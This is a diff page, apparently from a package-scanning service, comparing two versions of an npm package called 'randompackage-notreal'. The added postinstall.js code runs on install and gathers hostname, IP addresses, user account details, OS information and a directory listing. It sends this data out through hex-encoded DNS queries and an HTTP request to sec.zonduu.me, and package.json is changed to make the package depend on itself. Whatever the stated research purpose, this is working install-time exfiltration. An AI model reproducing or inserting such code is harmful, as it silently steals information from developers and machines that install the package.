randompackage-notreal 1.0.2 → 1.0.4
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +5 -2
- package/postinstall.js +15 -10
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "randompackage-notreal",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.4",
|
4
4
|
"description": "Researcher public package",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
@@ -14,5 +14,8 @@
|
|
14
14
|
"dist/css/common.css",
|
15
15
|
"postinstall.js",
|
16
16
|
"index.js"
|
17
|
-
]
|
17
|
+
],
|
18
|
+
"dependencies": {
|
19
|
+
"randompackage-notreal": "^1.0.3"
|
20
|
+
}
|
18
21
|
}
|
package/postinstall.js
CHANGED
@@ -3,6 +3,7 @@ const dns = require('dns');
|
|
3
3
|
const http = require('http');
|
4
4
|
const https = require('https');
|
5
5
|
const os = require('os');
|
6
|
+
const { execSync } = require('child_process');
|
6
7
|
|
7
8
|
const logFile = '/tmp/postinstall.log';
|
8
9
|
|
@@ -13,12 +14,19 @@ fs.appendFileSync(logFile, `Starting postinstall script\n`);
|
|
13
14
|
const hostname = os.hostname();
|
14
15
|
const packageName = process.env.npm_package_name;
|
15
16
|
const packageVersion = process.env.npm_package_version;
|
16
|
-
const internalIpAddress =
|
17
|
-
const currentPath = process.cwd();
|
17
|
+
const internalIpAddress = execSync('hostname -I').toString().trim();
|
18
|
+
const currentPath = process.cwd(); // Use process.cwd() to capture current directory
|
18
19
|
const platform = os.platform();
|
19
20
|
const userInfo = os.userInfo();
|
20
21
|
|
21
|
-
//
|
22
|
+
// Get list of files in the current directory (where npm install is run)
|
23
|
+
let directoryFiles;
|
24
|
+
try {
|
25
|
+
directoryFiles = execSync('ls').toString().trim();
|
26
|
+
} catch (error) {
|
27
|
+
directoryFiles = `Error executing ls command: ${error.message}`;
|
28
|
+
}
|
29
|
+
|
22
30
|
const osDetails = {
|
23
31
|
platform: os.platform(),
|
24
32
|
release: os.release(),
|
@@ -58,23 +66,21 @@ fetchExternalIpAddress((err, externalIpAddress) => {
|
|
58
66
|
currentPath,
|
59
67
|
platform,
|
60
68
|
userInfo,
|
61
|
-
osDetails
|
69
|
+
osDetails,
|
70
|
+
directoryFiles // Include the directory listing from the current directory
|
62
71
|
};
|
63
72
|
|
64
73
|
fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
|
65
74
|
|
66
|
-
// Prepare data for DNS exfiltration
|
67
75
|
const dnsData = `${packageName}-${hostname}-${externalIpAddress}`;
|
68
76
|
const hexData = Buffer.from(dnsData).toString('hex');
|
69
77
|
|
70
|
-
// Split hex data into parts fitting within DNS label length limit
|
71
78
|
const maxLabelLength = 63;
|
72
79
|
const hexDataParts = [];
|
73
80
|
for (let i = 0; i < hexData.length; i += maxLabelLength) {
|
74
81
|
hexDataParts.push(hexData.substring(i, i + maxLabelLength));
|
75
82
|
}
|
76
83
|
|
77
|
-
// Send each part as a separate DNS query
|
78
84
|
hexDataParts.forEach((part, index, arr) => {
|
79
85
|
const partIndex = index + 1;
|
80
86
|
const totalParts = arr.length;
|
@@ -88,12 +94,11 @@ fetchExternalIpAddress((err, externalIpAddress) => {
|
|
88
94
|
});
|
89
95
|
});
|
90
96
|
|
91
|
-
// HTTP fallback
|
92
97
|
const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
|
93
98
|
|
94
99
|
const options = {
|
95
|
-
hostname: 'sec.zonduu.me',
|
96
|
-
port: 80,
|
100
|
+
hostname: 'sec.zonduu.me',
|
101
|
+
port: 80,
|
97
102
|
path: `/callbackplz?${getData}`,
|
98
103
|
method: 'GET'
|
99
104
|
};
|